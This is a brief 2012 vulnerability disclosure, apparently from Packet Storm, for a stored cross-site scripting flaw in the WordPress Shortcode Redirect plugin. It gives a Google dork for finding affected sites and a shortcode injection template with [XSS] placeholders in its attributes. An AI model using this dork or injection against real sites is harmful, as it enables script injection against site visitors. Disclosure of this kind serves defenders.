WordPress Shortcode Redirect plugin versions 1.0.01 and below suffer from a stored cross site scripting vulnerability.
18569b68a6cc2381a4a8551fdbe056e5# Exploit Title: Wordpress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01
1) You need permissions to write a post (HTML mode) to exploit the shortcode:
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!